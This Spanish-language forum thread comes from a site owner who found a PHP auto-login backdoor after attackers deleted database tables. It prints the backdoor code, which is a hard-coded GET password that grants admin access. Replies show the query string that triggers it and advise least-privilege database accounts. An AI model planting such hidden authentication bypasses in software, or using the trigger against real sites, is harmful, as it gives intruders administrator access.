ver datos de acceso a database

ohdude · #1 (**permalink**) 14/07/2011, 17:23

Hola , resulta que tengo un script y hace poco tuvimos un ataque mediante el cual entraron a nuestra database y borraron algunas tablas de forma manual ; de manera que empezamos a investigar el codigo php y encontramos un backdoor de autologin.

Este es el codigo :

Código:

if ( $_GET['autologin'] == "runnow123@" )
{
    $admin = $db->fetchRow( "SELECT * FROM admin LIMIT 1" );
    $_SESSION['admin_username'] = $admin['username'];
    $_SESSION['admin_password'] = $admin['password'];
    header( "location: admin.php?view=dashboard" );
    exit( );

Me gustaria saber como ejecutar ese codigo para saber como hicieron para entrar en mi database o si tienen mayor informacion es de gran ayuda.

Muchas gracias.

truman_truman · #2 (**permalink**) 14/07/2011, 17:32

Yo creo que pusieron esto en la barra de direcciones del navegador

autologin="runnow123@"

y entraron como admin
.

ivan_teruel92 · #3 (**permalink**) 14/07/2011, 17:32

accediendo a es archivo con php y enviando los datos por get?? nose si lo entendi bien.

seria del tipo

archivo.php?autologuin=runnow123@

_ssx · #4 (**permalink**) 14/07/2011, 18:06

Por eso lo mas conveniente independiente de tu código es crear un usuario de la DB con privilegios limitados a hacer insert, select y uno diferente para los delete de registros NUNCA privilegios de creación y eliminación de TABLAS.